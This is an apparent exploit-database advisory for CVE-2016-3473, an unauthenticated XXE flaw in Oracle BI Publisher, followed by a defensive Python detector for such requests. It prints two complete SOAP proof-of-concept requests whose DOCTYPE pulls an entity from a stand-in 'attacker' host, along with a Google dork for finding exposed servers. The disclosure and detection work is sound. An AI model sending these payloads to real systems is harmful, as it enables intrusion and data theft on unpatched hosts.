Vendor: Oracle BI Publisher
By: Jakub Palaczynski
CVSS: 7,7 (HIGH)
Vulnerability: XML External Entity Injection
CWE: 611
Product Name: Oracle BI Publisher
Affected Version From: 11.1.1.6.0
Affected Version To: 12.2.1.0.0
Patch Exists: YES
Related CVE: CVE-2016-3473
CPE: a:oracle:bi_publisher
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2016

Oracle BI Publisher (formerly XML Publisher) – XML External Entity Injection w/o authentication

Oracle BI Publisher (formerly XML Publisher) is vulnerable to XML External Entity Injection without authentication. This vulnerability can be exploited by sending a specially crafted SOAP request to the vulnerable server. The vulnerable SOAP actions are 'replyToXML' and 'replyToXMLWithContext'. Previous versions of Oracle BI Publisher may also be vulnerable.

Mitigation:

Oracle has released a patch to address this vulnerability. Users should upgrade to the latest version of Oracle BI Publisher.

Exploit-DB raw data:

# Exploit Title: Oracle BI Publisher (formerly XML Publisher) - XML External Entity Injection w/o authentication
# Date: 20\10\2016
# Exploit Author: Jakub Palaczynski
# CVE : CVE-2016-3473
# Vendor Homepage: https://www.oracle.com/
# Version: 11.1.1.6.0, 11.1.1.7.0, 11.1.1.9.0, 12.2.1.0.0
# Info: Previous versions may also be vulnerable.
# Google Dork: inurl:xmlpserver or intitle:"Oracle BI Publisher Enterprise Login"

1. Vulnerable SOAP Action: replyToXML

POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXML
Host: vulnerablehost
Content-Length: 630

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:replyToXML soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
      </ser:replyToXML>
   </soapenv:Body>
</soapenv:Envelope>

------------------------------------------------

2. Vulnerable SOAP Action: replyToXMLWithContext

POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXMLWithContext
Host: vulnerablehost
Content-Length: 646

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:replyToXMLWithContext soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
      </ser:replyToXMLWithContext>
   </soapenv:Body>
</soapenv:Envelope>
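
Detection side of the two requests above, as an added example (not part of the original advisory or of Oracle's code): a check for a proxy or log pipeline that flags a DOCTYPE or external entity declaration inside `incomingXML`, whether it arrives in CDATA or entity-escaped. The function names, finding labels and the sample request are constructed for illustration.

```python
import html
import re

# Added example; names below are illustrative, not from the product.
# Endpoint and SOAP actions are the ones named in the advisory above.
GATEWAY_PATH = "/xmlpserver/services/ServiceGateway"
XXE_ACTIONS = {"replyToXML", "replyToXMLWithContext"}

INCOMING = re.compile(r"<incomingXML\b[^>]*>(.*?)</incomingXML>", re.S)
CDATA_SPLIT = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)
CHECKS = {
    "doctype-in-incomingXML": re.compile(r"<!DOCTYPE\b"),
    "external-entity-declaration": re.compile(
        r"<!ENTITY\s+(?:%\s+)?[\w.:-]+\s+(?:SYSTEM|PUBLIC)\b"),
}


def inner_xml(body):
    """Decode the <incomingXML> string as the SOAP layer would: CDATA
    sections are literal, other text has its character entities resolved."""
    m = INCOMING.search(body)
    if not m:
        return ""
    pieces = CDATA_SPLIT.split(m.group(1))  # odd indexes hold CDATA content
    return "".join(p if i % 2 else html.unescape(p) for i, p in enumerate(pieces))


def inspect_request(raw_request):
    """Return findings for one raw HTTP request; an empty list means clean."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    target = lines[0].split()[1:2]
    path = target[0].split("?")[0] if target else ""
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    action = headers.get("soapaction", "").strip('"#')
    if path != GATEWAY_PATH or action not in XXE_ACTIONS:
        return []
    doc = inner_xml(body)
    return [name for name, rx in CHECKS.items() if rx.search(doc)]


# Constructed sample: escaped (non-CDATA) variant with a placeholder host.
SAMPLE = (
    "POST /xmlpserver/services/ServiceGateway HTTP/1.1\r\n"
    "SOAPAction: \"#replyToXML\"\r\n\r\n"
    "<ser:replyToXML><incomingXML>&lt;!DOCTYPE m [ &lt;!ENTITY % remote SYSTEM "
    "\"http://collector.example/file.xml\"&gt;%remote;]&gt;</incomingXML></ser:replyToXML>"
)
print(inspect_request(SAMPLE))
```

Legitimate report XML passed to these actions has no reason to carry a DTD, so either finding is worth alerting on for unpatched hosts.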